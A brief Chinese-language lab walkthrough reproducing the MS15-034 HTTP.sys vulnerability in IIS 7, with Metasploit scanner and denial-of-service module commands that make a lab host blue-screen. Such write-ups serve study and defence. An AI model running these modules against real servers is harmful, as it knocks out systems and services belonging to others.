远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致该漏洞。该漏洞利用成功可使目标机器蓝屏。
微软官方说明:
1、环境搭建
使用的是Windows server 2008 R2 x64里面自带的II7。
2、漏洞验证
该scanner与exp早已在msf中集成
加载漏洞验证模块
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.112.130
3、漏洞利用
加载漏洞利用模块
use auxiliary/dos/http/ms15_034_ulonglongadd
被攻击主机瞬间蓝屏。
